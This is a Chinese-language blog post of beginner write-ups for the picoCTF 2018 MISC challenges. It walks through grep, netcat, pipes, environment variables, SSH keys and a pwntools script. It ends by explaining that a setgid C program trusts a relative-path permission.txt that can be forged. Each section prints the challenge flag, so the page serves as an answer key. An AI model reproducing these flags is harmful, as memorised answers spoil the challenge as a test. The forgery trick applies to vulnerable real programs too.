<!DOCTYPE html>
<html lang=zh-CN>
  <head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <meta name="description" content="Purse the balance of everything.">
  <meta name="keywords" content="CTF, Blog">
  
    <link rel="icon" href>
  
    
  <title>picoCTF2018 MISC全部题解 | Mads Blog</title>
  <link rel="stylesheet" href="/style.css">
  <link rel="stylesheet" href="/css/my.css">
  <link rel="stylesheet" href="/lib/jquery.fancybox.min.css">
  <link rel="stylesheet" href="/lib/gitalk.css">
  <script src="/lib/gitalk.min.js"></script>
  <link href="https://cdn.bootcss.com/font-awesome/5.7.0/css/all.css" rel="stylesheet">

</head>

<body>
  <header>
  <div class="header-container">
    <a class='logo' href="/">
      <!-- <i class="fas fa-cat" style="margin-right: 10px"></i> -->
      <span>Mads Blog | 还不是为了在平凡世界寻宝物。</span>
    </a>
    <ul class="right-header">
      
        <li class="nav-item">
          
            <a href="/archives" class="item-link">归档</a>
          
        </li>
      
        <li class="nav-item">
          
            <a href="/tags" class="item-link">标签</a>
          
        </li>
      
        <li class="nav-item">
          
            <a href="/about" class="item-link">关于</a>
          
        </li>
      
    </ul>
  </div>
</header>

  <main id='post'>
  <div class="content">
    <article>
        <section class="content aath-body">
          <h1>picoCTF2018 MISC全部题解</h1>
          
          <div class='post-meta'>
            <i class="fa fa-calendar" aria-hidden="true"></i> <time>2018年10月18日</time>
            
            
              | 
                  <i class="fa fa-tag" aria-hidden="true"></i>
                
               
  <a href="/tags/#MISC" class='tag'>MISC</a>


            
            | <i class="fas fa-edit" aria-hidden="true"></i> <time>2019年02月17日</time>
          </div>
          
          <p><em>首发于<a href="https://xz.aliyun.com/t/2926" target="_blank" rel="noopener">先知社区</a></em></p>
<p>picoCTF的题目分布由易到难，很适合新手入门，做题过程中可以学到东西。对于新手，我觉得misc题更是能引起学习兴趣的。于是我做完了picoCTF2018的misc题目，现在把Writeup发到网络上来供萌新学习。所有题目文件和解析脚本可以从<a href="https://github.com/lxzmads/my-ctf-vestige/tree/master/picoctf2018/misc_KO" target="_blank" rel="noopener">这里</a>找到.</p>
<h1 id="General-Warmup-1-150pts"><a href="#General-Warmup-1-150pts" class="headerlink" title="General Warmup 1 (150pts)"></a>General Warmup 1 (150pts)</h1><h1 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h1><p>If I told you your grade was 0x41 in hexadecimal, what would it be in ASCII? </p>
<blockquote>
<p>Hints:<br>(1) Submit your answer in our competition’s flag format. For example, if you answer was ‘hello’, you would submit ‘picoCTF{hello}’ as the flag.</p>
</blockquote>
<h2 id="题解"><a href="#题解" class="headerlink" title="题解"></a>题解</h2><p>题目意思很明确, 并且告诉你这就是ASCII, 于是Google ASCII, 对照ASCII码表就可以解出来了。还可以用Python来解<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">print</span> <span class="string">'picoCTF&#123;'</span>+chr(<span class="string">'0x41'</span>)+<span class="string">'&#125;'</span></span><br><span class="line"><span class="comment"># picoCTF&#123;A&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="General-Warmup-2-50pts"><a href="#General-Warmup-2-50pts" class="headerlink" title="General Warmup 2 (50pts)"></a>General Warmup 2 (50pts)</h1><h2 id="题目-1"><a href="#题目-1" class="headerlink" title="题目"></a>题目</h2><p>Can you convert the number 27 (base 10) to binary (base 2)? </p>
<blockquote>
<p>Hints:<br>(1) Submit your answer in our competition’s flag format. For example, if you answer was ‘11111’, you would submit ‘picoCTF{11111}’ as the flag.</p>
</blockquote>
<h2 id="题解-1"><a href="#题解-1" class="headerlink" title="题解"></a>题解</h2><p>进制转换, 没什么多说的.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">print</span> <span class="string">'picoCTF&#123;'</span>+bin(<span class="number">27</span>)[<span class="number">2</span>:]+<span class="string">'&#125;'</span></span><br><span class="line"><span class="comment"># picoCTF&#123;11011&#125;</span></span><br></pre></td></tr></table></figure>
<h1 id="General-Warmup-3-50pts"><a href="#General-Warmup-3-50pts" class="headerlink" title="General Warmup 3 (50pts)"></a>General Warmup 3 (50pts)</h1><h2 id="题目-2"><a href="#题目-2" class="headerlink" title="题目"></a>题目</h2><p>What is 0x3D (base 16) in decimal (base 10).</p>
<blockquote>
<p>Hints:<br>(1) Submit your answer in our competition’s flag format. For example, if you answer was ‘22’, you would submit ‘picoCTF{22}’ as the flag.</p>
</blockquote>
<h2 id="题解-2"><a href="#题解-2" class="headerlink" title="题解"></a>题解</h2><p>进制转换.</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">print</span> <span class="string">'picoCTF&#123;'</span>+int(<span class="string">'0x3D'</span>, <span class="number">16</span>)+<span class="string">'&#125;'</span></span><br><span class="line"><span class="comment"># picoCTF&#123;61&#125;</span></span><br></pre></td></tr></table></figure>
<h1 id="Resources-50pts"><a href="#Resources-50pts" class="headerlink" title="Resources (50pts)"></a>Resources (50pts)</h1><h2 id="题目-3"><a href="#题目-3" class="headerlink" title="题目"></a>题目</h2><p>We put together a bunch of resources to help you out on our website! If you go over there, you might even find a flag! [link [1]] (<a href="https://picoctf.com/resources" target="_blank" rel="noopener">https://picoctf.com/resources</a> )</p>
<h2 id="题解-3"><a href="#题解-3" class="headerlink" title="题解"></a>题解</h2><p>就是观看一些介绍, 在网页中<code>Ctrl+F</code>搜索<code>picoCTF</code>, 得到flag. 也可用脚本<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests, re </span><br><span class="line">r = requests.get(<span class="string">'https://picoctf.com/resources'</span>)</span><br><span class="line"><span class="keyword">print</span> re.findall(<span class="string">r'(picoCTF\&#123;.*\&#125;)'</span>, r.text)[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># picoCTF&#123;xiexie_ni_lai_zheli&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="grep-1-75pts"><a href="#grep-1-75pts" class="headerlink" title="grep 1 (75pts)"></a>grep 1 (75pts)</h1><h2 id="题目-4"><a href="#题目-4" class="headerlink" title="题目"></a>题目</h2><p>Can you find the flag in <a href="https://2018shell2.picoctf.com/static/805ac70722810caa0b1c02bc88ef68d8/file" target="_blank" rel="noopener">file [1]</a> ? This would be really obnoxious to look through by hand, see if you can find a faster way. You can also find the file in /problems/grep-1_0_c0c0c16438cdbee39591397e16389f59 on the shell server.</p>
<blockquote>
<p>Hints:<br>grep <a href="https://ryanstutorials.net/linuxtutorial/grep.php" target="_blank" rel="noopener">tutorial</a></p>
</blockquote>
<h2 id="题解-4"><a href="#题解-4" class="headerlink" title="题解"></a>题解</h2><p>从类似这些题就可以看出, Hints给的非常充分, 你只需要具备学习能力就能做题, 而不需要足够的知识储备与脑洞能力. 这和国内的题目差别是很明显的.</p>
<p>直接利用sh脚本<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat file | grep picoCTF</span><br><span class="line"><span class="comment"># picoCTF&#123;grep_and_you_will_find_52e63a9f&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="net-cat-75pts"><a href="#net-cat-75pts" class="headerlink" title="net cat (75pts)"></a>net cat (75pts)</h1><h2 id="题目-5"><a href="#题目-5" class="headerlink" title="题目"></a>题目</h2><p>Using netcat (nc) will be a necessity throughout your adventure. Can you connect to <code>2018shell2.picoctf.com</code> at port <code>36356</code> to get the flag?</p>
<blockquote>
<p>Hints:<br>nc <a href="https://linux.die.net/man/1/nc" target="_blank" rel="noopener">tutorial</a></p>
</blockquote>
<h2 id="题解-5"><a href="#题解-5" class="headerlink" title="题解"></a>题解</h2><p>主要是学习nc的用法. 连上之后就可以看到flag.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nc 2018shell2.picoctf.com 36356</span><br></pre></td></tr></table></figure>
<h1 id="strings-100pts"><a href="#strings-100pts" class="headerlink" title="strings (100pts)"></a>strings (100pts)</h1><h2 id="题目-6"><a href="#题目-6" class="headerlink" title="题目"></a>题目</h2><p>Can you find the flag in this file [1]  without actually running it? You can also find the file in /problems/strings_4_40d221755b4a0b134c2a7a2e825ef95f on the shell server.</p>
<blockquote>
<p>Hints:<br><a href="https://linux.die.net/man/1/strings" target="_blank" rel="noopener">strings</a></p>
</blockquote>
<h2 id="题解-6"><a href="#题解-6" class="headerlink" title="题解"></a>题解</h2><p>主要是熟悉linux下的<code>strings</code>工具<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">strings strings|grep pico</span><br><span class="line"><span class="comment"># picoCTF&#123;sTrIngS_sAVeS_Time_d3ffa29c&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="pipe-110pts"><a href="#pipe-110pts" class="headerlink" title="pipe (110pts)"></a>pipe (110pts)</h1><h2 id="题目-7"><a href="#题目-7" class="headerlink" title="题目"></a>题目</h2><p>During your adventure, you will likely encounter a situation where you need to process data that you receive over the network rather than through a file. Can you find a way to save the output from this program and search for the flag? Connect with 2018shell2.picoctf.com 2015.</p>
<blockquote>
<p>Hints:<br>(1) Remember the flag format is picoCTF{XXXX} (2) Ever heard of a pipe? No not that kind of pipe… This <a href="http://www.linfo.org/pipes.html" target="_blank" rel="noopener">kind [1]</a></p>
</blockquote>
<h2 id="题解-7"><a href="#题解-7" class="headerlink" title="题解"></a>题解</h2><p>熟悉linux里面管道的原理以及操作<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nc 2018shell2.picoctf.com 2015 | grep pico</span><br><span class="line"><span class="comment"># picoCTF&#123;almost_like_mario_8861411c&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="grep-2-125pts"><a href="#grep-2-125pts" class="headerlink" title="grep 2 (125pts)"></a>grep 2 (125pts)</h1><h2 id="题目-8"><a href="#题目-8" class="headerlink" title="题目"></a>题目</h2><p>This one is a little bit harder. Can you find the flag in /problems/grep-2_4_06c2058761f24267033e7ca6ff9d9144/files on the shell server? Remember, grep is your friend.</p>
<blockquote>
<p>Hints:<br>grep <a href="https://ryanstutorials.net/linuxtutorial/grep.php" target="_blank" rel="noopener">tutorial</a></p>
</blockquote>
<h2 id="题解-8"><a href="#题解-8" class="headerlink" title="题解"></a>题解</h2><p>连上题目服务器, 进入到指定文件夹之后发现有很多的文件夹, flag就藏在某个文件夹的某个文件里面, 查阅grep的文档, 发现<code>-r</code>参数可以递归探测目录. 于是在题目目录运行命令<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">'pico'</span> -r .</span><br><span class="line"><span class="comment"># ./files2/file3:picoCTF&#123;grep_r_and_you_will_find_036bbb25&#125;</span></span><br></pre></td></tr></table></figure></p>
<p>得到flag. </p>
<h1 id="Aca-Shell-A-150pts"><a href="#Aca-Shell-A-150pts" class="headerlink" title="Aca-Shell-A (150pts)"></a>Aca-Shell-A (150pts)</h1><h2 id="题目-9"><a href="#题目-9" class="headerlink" title="题目"></a>题目</h2><p>It’s never a bad idea to brush up on those linux skills or even learn some new ones before you set off on this adventure! Connect with nc 2018shell2.picoctf.com 6903.</p>
<blockquote>
<p>Hints:<br>Linux for <a href="https://maker.pro/education/basic-linux-commands-for-beginners" target="_blank" rel="noopener">Beginners</a></p>
</blockquote>
<h2 id="题解-9"><a href="#题解-9" class="headerlink" title="题解"></a>题解</h2><p>题目是一个游戏, 主要考察基本linux命令的使用.<br>连上之后首先输出一大段话<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Sweet! We have gotten access into the system but we aren&apos;t root.</span><br><span class="line">It&apos;s some sort of restricted shell! I can&apos;t see what you are typing</span><br><span class="line">but I can see your output. I&apos;ll be here to help you along.</span><br><span class="line">If you need help, type &quot;echo &apos;Help Me!&apos;&quot; and I&apos;ll see what I can do</span><br><span class="line">There is not much time left!</span><br></pre></td></tr></table></figure></p>
<p>这是个很有意思的shell, 它可以根据shell的输入来执行命令, 而不是你的输入. 我们<code>echo &#39;Help Me!&#39;</code>来看一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You got this! Have you looked for any  directories?</span><br></pre></td></tr></table></figure>
<p>提示看一下目录, 于是我们<code>ls</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">blackmail</span><br><span class="line">executables</span><br><span class="line">passwords</span><br><span class="line">photos</span><br><span class="line">secret</span><br></pre></td></tr></table></figure></p>
<p>看到五个目录, 有个<code>secret</code>目录引人注目, <code>cd</code>进入<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Now we are cookin&apos;! Take a look around there and tell me what you find!</span><br></pre></td></tr></table></figure></p>
<p>继续<code>ls</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">intel_1</span><br><span class="line">intel_2</span><br><span class="line">intel_3</span><br><span class="line">intel_4</span><br><span class="line">intel_5</span><br><span class="line">profile_ahqueith5aekongieP4ahzugi</span><br><span class="line">profile_ahShaighaxahMooshuP1johgo</span><br><span class="line">profile_aik4hah9ilie9foru0Phoaph0</span><br><span class="line">profile_AipieG5Ua9aewei5ieSoh7aph</span><br><span class="line">profile_bah9Ech9oa4xaicohphahfaiG</span><br><span class="line">profile_ie7sheiP7su2At2ahw6iRikoe</span><br><span class="line">profile_of0Nee4laith8odaeLachoonu</span><br><span class="line">profile_poh9eij4Choophaweiwev6eev</span><br><span class="line">profile_poo3ipohGohThi9Cohverai7e</span><br><span class="line">profile_Xei2uu5suwangohceedaifohs</span><br><span class="line">Sabatoge them! Get rid of all their intel files!</span><br></pre></td></tr></table></figure></p>
<p>最后一句告诉我们删掉所有的<code>intel</code>文件, 于是<code>rm intel*</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Nice! Once they are all gone, I think I can drop you a file of an exploit!</span><br><span class="line">Just type &quot;echo &apos;Drop it in!&apos; &quot; and we can give it a whirl!</span><br></pre></td></tr></table></figure></p>
<p>接着按照提示<code>echo &#39;Drop it in!&#39;</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">I placed a file in the executables folder as it looks like the only place we can execute from!</span><br><span class="line">Run the script I wrote to have a little more impact on the system!</span><br></pre></td></tr></table></figure></p>
<p>按照提示<code>cd ..</code>到上层目录, 再进入<code>executables</code>目录, <code>./dontLookHere</code>运行可执行程序, 输出一大堆十六进制, 貌似是为了看起来很牛逼, 最后有一段文字是提示<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Looking through the text above, I think I have found the password. I am just having trouble with a username.</span><br><span class="line">Oh drats! They are onto us! We could get kicked out soon!</span><br><span class="line">Quick! Print the username to the screen so we can close are backdoor and log into the account directly!</span><br><span class="line">You have to find another way other than echo!</span><br></pre></td></tr></table></figure></p>
<p>意思就是要输出用户名, 但是<code>echo</code>不能用了, 查阅Linux文档, 发现可以用<code>whoami</code>输出用户名, 于是<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">l33th4x0r</span><br><span class="line">Perfect! One second!</span><br><span class="line">Okay, I think I have got what we are looking for. I just need to to copy the file to a place we can read.</span><br><span class="line">Try copying the file called TopSecret in tmp directory into the passwords folder.</span><br></pre></td></tr></table></figure></p>
<p>按照提示, <code>cp /tmp/TopSecret ../passwords</code><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Server shutdown in 10 seconds...</span><br><span class="line">Quick! go read the file before we lose our connection!</span><br></pre></td></tr></table></figure></p>
<p>最后进入到 <code>passwords</code>目录, <code>cat TopSecret</code>得到flag<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">picoCTF&#123;CrUsHeD_It_dddcec58&#125;</span><br></pre></td></tr></table></figure></p>
<h1 id="environ-150pts"><a href="#environ-150pts" class="headerlink" title="environ (150pts)"></a>environ (150pts)</h1><h2 id="题目-10"><a href="#题目-10" class="headerlink" title="题目"></a>题目</h2><p>Sometimes you have to configure environment variables before executing a program. Can you find the flag we’ve hidden in an environment variable on the shell server?</p>
<blockquote>
<p>Hints:<br>unix <a href="https://www.tutorialspoint.com/unix/unix-environment.htm" target="_blank" rel="noopener">env</a></p>
</blockquote>
<h2 id="题解-10"><a href="#题解-10" class="headerlink" title="题解"></a>题解</h2><p>主要是熟悉unix下的环境变量. 我们连上题目服务器后, 运行<code>env|grep pico|cut -d &#39;=&#39; -f2</code>, 得到flag<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mads@pico-2018-shell-2:~$ env|grep pico|cut -d <span class="string">'='</span> -f2</span><br><span class="line">picoCTF&#123;eNv1r0nM3nT_v4r14Bl3_fL4g_3758492&#125;</span><br></pre></td></tr></table></figure></p>
<h1 id="ssh-keyz-150pts"><a href="#ssh-keyz-150pts" class="headerlink" title="ssh-keyz (150pts)"></a>ssh-keyz (150pts)</h1><h2 id="题目-11"><a href="#题目-11" class="headerlink" title="题目"></a>题目</h2><p>As nice as it is to use our webshell, sometimes its helpful to connect directly to our machine. To do so, please add your own public key to ~/.ssh/authorized_keys, using the webshell. The flag is in the ssh banner which will be displayed when you login remotely with ssh to  with your username.</p>
<blockquote>
<p>Hints:<br>key generation <a href="https://confluence.atlassian.com/bitbucketserver/creating-ssh-keys-776639788.html" target="_blank" rel="noopener">tutorial</a><br>We also have an expert demonstrator to help you along.<a href="https://www.youtube.com/watch?v=3CN65ccfllU&amp;list=PLJ_vkrXdcgH-lYlRV8O-kef2zWvoy79yP&amp;index=4" target="_blank" rel="noopener">link</a></p>
</blockquote>
<h2 id="题解-11"><a href="#题解-11" class="headerlink" title="题解"></a>题解</h2><p>基本的用私钥登录服务器的教程, 按照教程一步步做, 连上服务器就能看到flag.</p>
<p>一键脚本:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh mads@2018shell2.picoctf.com <span class="string">'exit'</span>|grep pico</span><br><span class="line"><span class="comment"># picoCTF&#123;who_n33ds_p4ssw0rds_38dj21&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="what-base-is-this-200pts"><a href="#what-base-is-this-200pts" class="headerlink" title="what base is this? (200pts)"></a>what base is this? (200pts)</h1><h2 id="题目-12"><a href="#题目-12" class="headerlink" title="题目"></a>题目</h2><p>To be successful on your mission, you must be able read data represented in different ways, such as hexadecimal or binary. Can you get the flag from this program to prove you are ready? Connect with <code>nc 2018shell2.picoctf.com 15853</code>.</p>
<blockquote>
<p>Hints:<br>(1) I hear python is a good means (among many) to convert things. (2) It might help to have multiple windows open</p>
</blockquote>
<h2 id="题解-12"><a href="#题解-12" class="headerlink" title="题解"></a>题解</h2><p>连上之后就是给一系列的不同进制的数据, 然后按要求转换之后给答案. 我们可以用python的<a href="http://docs.pwntools.com/en/stable/" target="_blank" rel="noopener">pwntools</a>库与程序交互, <code>re</code>模块完成字符串查找, python 本身进行进制转换, 给出一键脚本如下<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">context.log_level = <span class="string">'error'</span></span><br><span class="line">sh = remote(<span class="string">'2018shell2.picoctf.com'</span>, <span class="number">15853</span>)</span><br><span class="line">msg1 = sh.recv()</span><br><span class="line">t1 = re.findall(<span class="string">'([01]&#123;8&#125;)'</span>, msg1)</span><br><span class="line">t1 = <span class="string">''</span>.join(map(<span class="keyword">lambda</span> x:chr(int(x,<span class="number">2</span>)), t1))</span><br><span class="line">sh.sendline(t1)</span><br><span class="line">msg2 = sh.recv()</span><br><span class="line">t2 = re.findall(<span class="string">'([0-9a-f]&#123;8,&#125;)'</span>, msg2)</span><br><span class="line">sh.sendline(t2[<span class="number">0</span>].decode(<span class="string">'hex'</span>))</span><br><span class="line">msg3 = sh.recv()</span><br><span class="line">t3 = re.findall(<span class="string">"(\d&#123;3&#125;)"</span>, msg3)</span><br><span class="line">t3 = <span class="string">''</span>.join(map(<span class="keyword">lambda</span> x:chr(int(x, <span class="number">8</span>)), t3))</span><br><span class="line">sh.sendline(t3)</span><br><span class="line"><span class="keyword">print</span> re.findall(<span class="string">'(picoCTF&#123;.*&#125;)'</span>, sh.recv())[<span class="number">0</span>]</span><br><span class="line"><span class="comment"># picoCTF&#123;delusions_about_finding_values_3cc386de&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="you-can’t-see-me-200pts"><a href="#you-can’t-see-me-200pts" class="headerlink" title="you can’t see me (200pts)"></a>you can’t see me (200pts)</h1><h2 id="题目-13"><a href="#题目-13" class="headerlink" title="题目"></a>题目</h2><p>‘…reading transmission… Y.O.U. .C.A.N.’.T. .S.E.E. .M.E.  …transmission ended…’ Maybe something lies in /problems/you-can-t-see-me_3_1a39ec6c80b3f3a18610074f68acfe69.</p>
<blockquote>
<p>Hints:<br>(1) What command can see/read files? (2) What’s in the manual page of ls?</p>
</blockquote>
<h2 id="题解-13"><a href="#题解-13" class="headerlink" title="题解"></a>题解</h2><p>进入到目录之后, <code>ls -al</code>发现有隐藏文件<code>.</code>, 其实后面还有两个空白字符, 在服务器上可以用<code>tab</code>键补全就可以查看到了, 这里给个一键脚本:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh -q mads@2018shell2.picoctf.com <span class="string">"cat  /problems/you-can-t-see-me_3_1a39ec6c80b3f3a18610074f68acfe69/.\ \ "</span></span><br></pre></td></tr></table></figure></p>
<h1 id="absolutely-relative-250pts"><a href="#absolutely-relative-250pts" class="headerlink" title="absolutely relative (250pts)"></a>absolutely relative (250pts)</h1><h2 id="题目-14"><a href="#题目-14" class="headerlink" title="题目"></a>题目</h2><p>In a filesystem, everything is relative ¯_(ツ)_/¯. Can you find a way to get a flag from this <a href="https://2018shell2.picoctf.com/static/94e0cff2fa6fb11f5c85edccb8144415/absolutely-relative" target="_blank" rel="noopener">program [1]</a> ? You can find it in /problems/absolutely-relative_4_bef88c36784b44d2585bb4d2dbe074bd on the shell server. <a href="https://2018shell2.picoctf.com/static/94e0cff2fa6fb11f5c85edccb8144415/absolutely-relative.c" target="_blank" rel="noopener">Source [2]</a> .</p>
<blockquote>
<p>Hints:<br>(1) Do you have to run the program in the same directory? (⊙.☉)7 (2) Ever used a text editor? Check out the program ‘nano’</p>
</blockquote>
<h2 id="题解-14"><a href="#题解-14" class="headerlink" title="题解"></a>题解</h2><p>给了C源码<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> yes_len 3</span></span><br><span class="line"><span class="keyword">const</span> <span class="keyword">char</span> *yes = <span class="string">"yes"</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> flag[<span class="number">99</span>];</span><br><span class="line">    <span class="keyword">char</span> permission[<span class="number">10</span>];</span><br><span class="line">    <span class="keyword">int</span> i;</span><br><span class="line">    FILE * file;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    file = fopen(<span class="string">"/problems/absolutely-relative_4_bef88c36784b44d2585bb4d2dbe074bd/flag.txt"</span> , <span class="string">"r"</span>);</span><br><span class="line">    <span class="keyword">if</span> (file) &#123;</span><br><span class="line">    	<span class="keyword">while</span> (<span class="built_in">fscanf</span>(file, <span class="string">"%s"</span>, flag)!=EOF)</span><br><span class="line">    	fclose(file);</span><br><span class="line">    &#125;   </span><br><span class="line">	</span><br><span class="line">    file = fopen( <span class="string">"./permission.txt"</span> , <span class="string">"r"</span>);</span><br><span class="line">    <span class="keyword">if</span> (file) &#123;</span><br><span class="line">    	<span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; <span class="number">5</span>; i++)&#123;</span><br><span class="line">            <span class="built_in">fscanf</span>(file, <span class="string">"%s"</span>, permission);</span><br><span class="line">        &#125;</span><br><span class="line">        permission[<span class="number">5</span>] = <span class="string">'\0'</span>;</span><br><span class="line">        fclose(file);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">strncmp</span>(permission, yes, yes_len)) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"You have the write permissions.\n%s\n"</span>, flag);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">"You do not have sufficient permissions to view the flag.\n"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>程序大概就是先从一个文件读取flag, 然后再读取一个<code>permission.txt</code>文件前五个字符, 再判断读取到的permission的前三个字符是否为<code>yes</code>, 是的话输出flag, 不是的话提示权限不足.</p>
<p>我们进入服务器上题目文件夹下, <code>ls -al</code>查看文件权限<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">total 76</span><br><span class="line">drwxr-xr-x   2 root       root                   4096 Sep 28 07:42 .</span><br><span class="line">drwxr-x--x 576 root       root                  53248 Sep 30 03:50 ..</span><br><span class="line">-rwxr-sr-x   1 hacksports absolutely-relative_4  8984 Sep 28 07:42 absolutely-relative</span><br><span class="line">-rw-rw-r--   1 hacksports hacksports              796 Sep 28 07:42 absolutely-relative.c</span><br><span class="line">-r--r-----   1 hacksports absolutely-relative_4    37 Sep 28 07:42 flag.txt</span><br></pre></td></tr></table></figure></p>
<p>发现没有<code>permission.txt</code>文件, 并且flag文件也没法读. 根据题目提示<code>absolutely relative</code>以及注意到源码中读取<code>permission.txt</code>是通过相对路径读取的, 于是我们可以伪造<code>permission.txt</code>.</p>
